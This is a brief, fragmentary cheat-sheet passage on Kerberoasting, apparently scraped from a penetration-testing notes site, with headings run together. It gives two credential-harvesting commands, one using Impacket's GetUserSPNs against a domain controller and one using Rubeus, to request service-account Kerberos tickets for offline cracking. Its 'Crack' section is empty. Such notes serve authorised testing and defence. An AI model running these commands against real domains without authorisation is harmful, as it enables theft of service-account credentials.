Kerberoasting
Introduction
Performing the attack
Impacket
impacket-GetUserSPNs -request -dc-ip <dc_ip> <domain>/<username>Rubeus
.\Rubeus.exe kerberoast /outfile:<outputfile>Crack
Last updated